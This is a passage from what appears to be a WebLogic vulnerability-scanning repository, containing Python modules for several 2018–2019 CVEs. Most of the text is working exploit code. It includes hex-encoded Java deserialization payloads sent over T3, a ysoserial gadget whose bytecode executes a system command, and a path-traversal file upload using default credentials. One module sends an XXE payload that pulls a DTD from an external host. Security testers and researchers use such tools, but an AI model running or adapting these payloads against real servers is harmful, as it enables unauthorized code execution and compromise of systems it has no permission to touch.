47 |         payload += b'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
48 |         payload = struct.pack('>I', len(payload)) + payload[4:]
49 |         sock.send(payload)
50 |         time.sleep(delay)
51 |         try:
52 |             res = sock.recv(4096)
53 |             return res != b'', {'msg': 'finish.'}
54 |         except socket.timeout:
55 |             return False, {'msg': 'connection timeout.'}
56 | 
57 | 
58 | def run(queue: SyncManager.Queue, data: Dict):
59 |     obj = CVE_2018_3245()
60 |     result = {
61 |         'IP': data['IP'],
62 |         'PORT': data['PORT'],
63 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
64 |         'MSG': '',
65 |         'STATE': False
66 |     }
67 |     result['STATE'], result['MSG'] = obj.light_and_msg(
68 |         data['IP'], data['PORT'], data['IS_SSL'])
69 | 
70 |     queue.put(result)
71 | 


--------------------------------------------------------------------------------
/stars/cve_2018_3252.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2018-3252
 4 | # 必须要用户名密码正确才可以验证
 5 | # updated 2019/12/05
 6 | # by 0xn0ne
 7 | 
 8 | from stars import target_type, Star
 9 | from utils import http
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | 
14 | # @universe.groups()
15 | class CVE_2018_3252(Star):
16 |     info = {
17 |         'NAME': '',
18 |         'CVE': 'CVE-2018-3252',
19 |         'TAG': []
20 |     }
21 |     type = target_type.MODULE
22 | 
23 |     def light_up(self, dip, dport, force_ssl=None, *args, **kwargs) -> (bool, dict):
24 |         url = 'http://{}:{}/bea_wls_deployment_internal/DeploymentService'.format(
25 |             dip, dport)
26 |         headers = {'Host': '127.0.0.1:7001', 'wl_request_type': 'data_transfer_request', 'Username': 'weblogic',
27 |                    'Password': 'weblogic'}
28 |         data = bytes.fromhex(
29 |             '737200176A6176612E7574696C2E4C696E6B656448617368536574D86CD75A95DD2A1E02000077020000787200116A6176612E7574696C2E48617368536574BA44859596B8B734030000770200007870770C000000103F400000000000027372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000949000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785A00155F75736553657276696365734D656368616E69736D4C00195F61636365737345787465726E616C5374796C6573686565747400124C6A6176612F6C616E672F537472696E673B4C000B5F617578436C617373657374003B4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B77020000787000000000FFFFFFFF00740003616C6C70757200035B5B424BFD19156767DB3702000077020000787000000002757200025B42ACF317F8060854E00200007702000078700000083CCAFEBABE0000003300570A0003002207005507002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E01000463616C6308003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B00340100136A6176612F6C616E672F457863657074696F6E0700360100106A6176612F6C616E672F53797374656D0700380100036F75740100154C6A6176612F696F2F5072696E7453747265616D3B0C003A003B090039003C01000F636D645F657869745F636F64653D3008003E010010636D645F657869745F636F64653D2D310800400100136A6176612F696F2F5072696E7453747265616D0700420100077072696E746C6E010015284C6A6176612F6C616E672F537472696E673B29560C004400450A004300460C003A003B090039004808003E0800400C004400450A0043004C0100116A6176612F6C616E672F50726F6365737307004E0100136A6176612F6C616E672F5468726F7761626C650700500100106A6176612F6C616E672F537472696E6707005201000D537461636B4D61705461626C6501001E79736F73657269616C2F50776E65723232373231323639323131323933390A00030022002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70056B100000002000D00000006000100000083000E0000000C000100000005000F001200000001001300140002000C0000003F0000000300000001B100000002000D0000000600010000008B000E00000020000300000001000F0012000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D0000000600010000008F000E0000002A000400000001000F001200000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C000000BD000500040000003FA70003014C014DB8002F1231B600354DA7001C4EA700184EB2003D2C01A50008123FA700051241B600472DBFB200492C01A50008124AA70005124BB6004DB1000200070010001300370007001700170000000100540000005C000803FF000F0003000007004F000107003743070051FF000D00040000000700510001070043FF000100040000000700510002070043070053FF00040003000007004F0000FF000C00000001070043FF0001000000020700430700530002002000000002002100110000000A000100020023001000097571007E000D000001D4CAFEBABE00000033001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000007D000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E727077010078737D00000001001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C6174657377020000787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B7702000078707372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B770200007870737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C647702000078703F4000000000000C77080000001000000001740008663561356136303871007E0009787672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000077020000787078')
30 |         res, data = http(url, 'POST', headers=headers,
31 |                          data=data, ssl=force_ssl)
32 |         if res != None and ((res.status_code == 401) or (res.status_code == 500)):
33 |             return True, {'msg': 'finish.'}
34 |         return False, {'msg': 'finish.'}
35 | 
36 | 
37 | def run(queue: SyncManager.Queue, data: Dict):
38 |     obj = CVE_2018_3252()
39 |     result = {
40 |         'IP': data['IP'],
41 |         'PORT': data['PORT'],
42 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
43 |         'MSG': '',
44 |         'STATE': False
45 |     }
46 |     result['STATE'], result['MSG'] = obj.light_and_msg(
47 |         data['IP'], data['PORT'], data['IS_SSL'])
48 | 
49 |     queue.put(result)
50 | 


--------------------------------------------------------------------------------
/stars/cve_2019_2618.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2019-2618
 4 | # 必须要用户名密码正确才可以验证，鸡肋
 5 | # updated 2019/10/23
 6 | # by 0xn0ne
 7 | 
 8 | from stars import target_type, Star
 9 | from utils import http
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | 
14 | # @universe.groups()
15 | class CVE_2019_2618(Star):
16 |     info = {
17 |         'NAME': '',
18 |         'CVE': 'CVE-2019-2618',
19 |         'TAG': []
20 |     }
21 |     type = target_type.MODULE
22 | 
23 |     def light_up(self, dip, dport, force_ssl=None, *args, **kwargs) -> (bool, dict):
24 |         filename = 'poc.jsp'
25 |         data = f'''
26 | ------WebKitFormBoundary7MA4YWxkTrZu0gW
27 | Content-Disposition: form-data; name="{filename}"; filename="{filename}"
28 | Content-Type: false
29 | 
30 | hello
31 | 
32 | ------WebKitFormBoundary7MA4YWxkTrZu0gW--
33 | '''
34 |         headers = {'username': 'weblogic',
35 |                    'password': 'weblogic',
36 |                    'wl_request_type': 'app_upload',
37 |                    'wl_upload_application_name': '\\\\..\\\\tmp\\\\_WL_internal\\\\bea_wls_internal\\\\9j4dqk\\\\war',
38 |                    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW'}
39 |         url = 'http://{}:{}/bea_wls_deployment_internal/DeploymentService'.format(
40 |             dip, dport)
41 |         win_res, data = http(url, 'POST', headers=headers,
42 |                              data=data, ssl=force_ssl)
43 |         url = 'http://{}:{}/bea_wls_deployment_internal/DeploymentService'.format(
44 |             dip, dport)
45 |         headers['wl_upload_application_name'] = '/../tmp/_WL_internal/bea_wls_internal/9j4dqk/war'
46 |         unx_res, data = http(url, 'POST', headers=headers,
47 |                              data=data, ssl=force_ssl)
48 |         if (win_res != None and win_res.status_code != 404) or (unx_res != None and unx_res.status_code != 404):
49 |             return True, {'msg': 'finish.'}
50 |         # if (win_res != None and filename in win_res.text) or (unx_res != None and filename in unx_res.text):
51 |         #     return True, {'msg': 'finish.'}
52 |         return False, {'msg': 'finish.'}
53 | 
54 | 
55 | def run(queue: SyncManager.Queue, data: Dict):
56 |     obj = CVE_2019_2618()
57 |     result = {
58 |         'IP': data['IP'],
59 |         'PORT': data['PORT'],
60 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
61 |         'MSG': '',
62 |         'STATE': False
63 |     }
64 |     result['STATE'], result['MSG'] = obj.light_and_msg(
65 |         data['IP'], data['PORT'], data['IS_SSL'])
66 | 
67 |     queue.put(result)
68 | 


--------------------------------------------------------------------------------
/stars/cve_2019_2888.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2019-2888
 4 | # updated 2019/10/23
 5 | # by jas502n
 6 | # Not response
 7 | import binascii
 8 | import socket
 9 | import time
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | from stars import target_type, Star
14 | 
15 | 
16 | # @universe.groups()
17 | class CVE_2019_2888(Star):
18 |     info = {
19 |         'NAME': '',
20 |         'CVE': 'CVE-2019-2888',
21 |         'TAG': []
22 |     }
23 |     type = target_type.MODULE
24 | 
25 |     def light_up(self, dip, dport, force_ssl=None, delay=1, timeout=5, xxe_netloc='127.0.0.1:8080', *args,
26 |                  **kwargs) -> (bool, dict):
27 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s 左右，超过这个基本都是打了补丁的
28 |         # t3 handshake
29 |         dport = int(dport)
30 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31 |         sock.settimeout(timeout)
32 |         try:
33 |             sock.connect((dip, dport))
34 |         except socket.timeout:
35 |             return False, {'msg': 'connection timeout.'}
36 |         except ConnectionRefusedError:
37 |             return False, {'msg': 'connection refuse.'}
38 |         sock.send(bytes.fromhex(
39 |             '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
40 |         time.sleep(delay)
41 |         sock.recv(1024)
42 | 
43 |         # build t3 request object
44 |         payload = '000009f3016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000'
45 | 
46 |         # send evil object data
47 |         payload += 'aced00057372002f7765626c6f6769632e736572766c65742e656a62326a73702e64642e454a425461676c696244657363726970746f7282ded23716d9cc790c000078707a0000'
48 |         # -------- attack code start --------
49 |         eval_payload = '041a3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e3c21444f435459504520786d6c726f6f746e616d65205b3c21454e544954592025206161612053595354454d2022687474703a2f2f'
50 |         eval_payload += xxe_netloc.encode().hex()
51 |         eval_payload += '2f6578742e647464223e256161613b256363633b256464643b5d3e2f7777772e6265612e636f6d2f736572766572732f776c733630302f6474642f7765626c6f6769632d656a62326a73702e647464223e0a3c656a62326a73702d7461676c69623e0a20203c66696c6573797374656d2d696e666f3e0a202020203c6a617661632d706174683e3c2f6a617661632d706174683e0a202020203c6a617661632d666c6167733e3c2f6a617661632d666c6167733e0a202020203c636f6d70696c652d636c617373706174683e0a202020203c2f636f6d70696c652d636c617373706174683e0a202020203c6b65657067656e6572617465643e66616c73653c2f6b65657067656e6572617465643e0a202020203c736f757263652d706174683e0a202020203c2f736f757263652d706174683e0a202020203c7061636b6167652d6e616d653e3c2f7061636b6167652d6e616d653e0a202020203c656a622d6a61722d66696c653e3c2f656a622d6a61722d66696c653e0a202020203c736176652d61733e3c2f736176652d61733e0a202020203c736176652d7461676c69622d6a61723e0a2020202020203c746d706469723e3c2f746d706469723e0a2020202020203c7461676c69622d6a61722d66696c653e3c2f7461676c69622d6a61722d66696c653e0a202020203c2f736176652d7461676c69622d6a61723e0a202020203c736176652d7461676c69622d6469726563746f72793e0a2020202020203c636c61737365732d6469726563746f72793e3c2f636c61737365732d6469726563746f72793e0a2020202020203c746c642d66696c653e3c2f746c642d66696c653e0a202020203c2f736176652d7461676c69622d6469726563746f72793e0a20203c2f66696c6573797374656d2d696e666f3e0a20203c656a623e0a202020203c656a622d6e616d653e3c2f656a622d6e616d653e0a202020203c72656d6f74652d747970653e3c2f72656d6f74652d747970653e0a202020203c686f6d652d747970653e3c2f686f6d652d747970653e0a202020203c6a6e64692d6e616d653e3c2f6a6e64692d6e616d653e0a202020203c656a622d747970653e3c2f656a622d747970653e0a202020203c656e61626c65643e747275653c2f656e61626c65643e0a202020203c656a622d6d6574686f64733e0a202020203c2f656a622d6d6574686f64733e0a202020203c686f6d652d6d6574686f64733e0a202020203c2f686f6d652d6d6574686f64733e'
52 |         payload += '0' + hex(len(binascii.unhexlify(eval_payload)))[2:]
53 |         payload += eval_payload
54 |         payload += '771c0a20203c2f656a623e0a3c2f656a62326a73702d7461676c69623e0a78'
55 |         payload += 'fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078'
56 |         payload += '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
57 | 
58 |         # --------- attack code end ---------
59 |         sock.send(bytes.fromhex(payload))
60 |         time.sleep(delay)
61 | 
62 |         return True, {'msg': 'finish.'}
63 | 
64 | 
65 | def run(queue: SyncManager.Queue, data: Dict):
66 |     obj = CVE_2019_2888()
67 |     result = {
68 |         'IP': data['IP'],
69 |         'PORT': data['PORT'],
70 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
71 |         'MSG': '',
72 |         'STATE': False
73 |     }
74 |     result['STATE'], result['MSG'] = obj.light_and_msg(
75 |         data['IP'], data['PORT'], data['IS_SSL'])
76 | 
77 |     queue.put(result)
78 | 


--------------------------------------------------------------------------------
/stars/cve_2019_2890.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2019-2890
 4 | # updated 2019/10/23
 5 | # by 0xn0ne
 6 | 
 7 | import re
 8 | import socket
 9 | import time
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | from stars import target_type, Star
14 | 
15 | 
16 | # @universe.groups()
17 | class CVE_2019_2890(Star):
18 |     info = {
19 |         'NAME': '',
20 |         'CVE': 'CVE-2019-2890',
21 |         'TAG': []
22 |     }
23 |     type = target_type.VULNERABILITY
24 | 
25 |     def light_up(self, dip, dport, force_ssl=None, delay=1, timeout=5, *args, **kwargs) -> (bool, dict):
26 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s 左右，超过这个基本都是打了补丁的
27 |         # t3 handshake
28 |         dport = int(dport)
29 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30 |         sock.settimeout(timeout)
31 |         try:
32 |             sock.connect((dip, dport))
33 |         except socket.timeout:
34 |             return False, {'msg': 'connection timeout.'}
35 |         except ConnectionRefusedError:
36 |             return False, {'msg': 'connection refuse.'}
37 |         sock.send(bytes.fromhex(
38 |             '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
39 |         time.sleep(delay)
40 |         sock.recv(1024)
41 | 
42 |         # build t3 request object
43 |         data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
44 |         data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
45 |             '{:04x}'.format(dport))
46 |         data3 = '1a7727000d3234322e323134'
47 |         data4 = '2e312e32353461863d1d0000000078'
48 |         for d in [data1, data2, data3, data4]:
49 |             sock.send(bytes.fromhex(d))
50 | 
51 |         # send evil object data
52 |         payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
53 |         # -------- attack code start --------
